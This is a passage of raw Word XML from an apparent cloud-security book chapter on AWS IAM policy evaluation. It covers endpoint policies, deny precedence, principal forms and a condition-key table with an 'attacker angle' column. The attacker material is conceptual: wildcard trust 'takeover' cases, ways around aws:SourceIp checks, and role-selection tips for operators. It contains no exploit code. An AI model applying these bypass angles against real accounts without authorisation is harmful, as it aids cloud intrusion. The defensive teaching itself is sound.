          <w:ilvl w:val="0"/>
          <w:numId w:val="3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VPC endpoint policies.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attached to a gateway or interface VPC endpoint (for S3, DynamoDB, and interface-endpoint-enabled services). Scope which principals and actions are permitted </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>through that endpoint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD6AD05" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>7.2  The canonical evaluation flowchart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B85CE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rules are simple, which is why this flowchart is ubiquitous in every AWS security presentation. Read it left-to-right as an algorithm: at each gate, if the answer makes the call fail, the call is denied; otherwise continue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D1CE35"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API call arrive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with principal + action + resource + contex</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Is there an explici</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Deny anywhere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SCP(s) allow this actio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for this account</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Is there a resource policy</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Does it allow / deny</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Identity policy allows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(user / role / group</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Permission boundar</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(if any) allows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Session policy (if any</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allows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VPC endpoint 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(if via endpoint) allows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ALLO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>W</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API call proceed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DEN</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AccessDenie</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Any explicit Deny at any stage terminates. Missing Allow at any required stage terminates. Allow at the right stages proceeds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policy evaluation. Read every misconfiguration finding in the rest of the book as a specific path through this flowchart</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4CE0A67D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>7.3  Explicit deny precedence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615FDE1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single </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Effect: Deny</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">anywhere in any applicable policy beats every </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Effect: Allow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is both the defender's strongest tool and the mechanism that, when mis-written, bricks an entire organization. SCPs in particular are death by mis-scoping — a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Deny</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>s3:*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> without a resource exclusion will block S3 for every principal in every affected account including the root user. Production operators see this every quarter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D788D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For an attacker, the presence of an explicit deny in a customer-managed policy is both a signal (the defender actively thought about this call) and an obstacle (your chosen primitive will not work as-is). Seasoned operators read the full identity policy of any role they intend to use, not just the simulated-allow flag from PMapper or Pacu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A9AFAB" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>7.4  Principal types in policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C50DD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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Principal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> element of a resource policy or a role trust policy admits several forms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B1897C"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{"AWS": "arn:aws:iam::123456789012:role/Foo"}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — specific role.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF44EB6"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{"AWS": "arn:aws:iam::123456789012:root"}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — any principal in the account. In a trust policy, this means "any IAM user or role in account 123456789012 that has </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:AssumeRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> in its identity policy." This is a common pattern — and is not a wildcard; the other account's IAM still gates who can assume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7C6EE9"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{"AWS": "*"}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — literally any AWS principal. In S3 bucket policy this means "any authenticated AWS user anywhere." In a role trust policy it means the same; combined with a missing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Condition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> this is a total takeover primitive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B7D5D6"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{"Service": "ec2.amazonaws.com"}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — AWS service principal. EC2 service assumes the role on the user's behalf when launching instances. Cannot be forged; but service-principal trust still needs hardening against confused deputies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31932984"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{"Federated": "arn:aws:iam::123456789012:saml-provider/Okta"}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — SAML provider. The SAML assertion's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> attribute picks which role gets assumed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AC7E53"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{"Federated": "arn:aws:iam::123456789012:oidc-provider/token.actions.githubusercontent.com"}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — OIDC provider. Conditions on the token's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> field gate which repo / branch can assume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75771A07" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>{"CanonicalUser": "&lt;64-hex&gt;"}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legacy S3 canonical user ID. Pre-dates account IDs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752E83B0" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>7.5  Condition keys — the grammar that gets misused</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147EEE9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Conditions narrow when a statement applies. They are the most frequently abused element of policy, because operators reach for conditions when plain principal scoping would be cleaner. The condition keys most worth knowing:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2981"/>
        <w:gridCol w:w="2487"/>
        <w:gridCol w:w="3892"/>
      </w:tblGrid>
      <w:tr w:rsidR="00000000" w14:paraId="267DE47A" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64944091"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Condition keys and their typical misuse.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="63E31C0F" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ECEAE3"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46B2E214" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:spacing w:before="216" w:after="216"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ECEAE3"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5797F739" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:spacing w:before="216" w:after="216"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Intended use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ECEAE3"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BF43D5D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:spacing w:before="216" w:after="216"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Attacker angle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="71ABFE60" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AB84E48" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:spacing w:before="216" w:after="216"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>aws:PrincipalArn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B9FEA0A"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Restrict to a specific identity ARN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30E238DB"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Wildcard patterns (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>StringLike</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>) permit any account to craft a matching ARN.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="05120B04" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E4A9A64" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:spacing w:before="216" w:after="216"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>aws:PrincipalOrgID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F11CF5C"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Restrict to principals in a specific org</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="294CDEF4"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 xml:space="preserve">Good control; but org ID is discoverable via </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>aws organizations describe-organization</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="79B7D62D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="203D39CC" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:spacing w:before="216" w:after="216"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>aws:SourceIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67DF1A6D"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IP allowlist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7505C733"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Bypassable via AWS-owned IP (Lambda, EC2 in customer account) if principal scope is wide.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="7E736CD5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CA076DC" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:spacing w:before="216" w:after="216"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>aws:SourceVpc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>aws:SourceVpce</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52FC88CC"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Restrict to a specific VPC endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D18E0C3"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 xml:space="preserve">Effective when combined with endpoint policy; useless alone if the endpoint allows </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
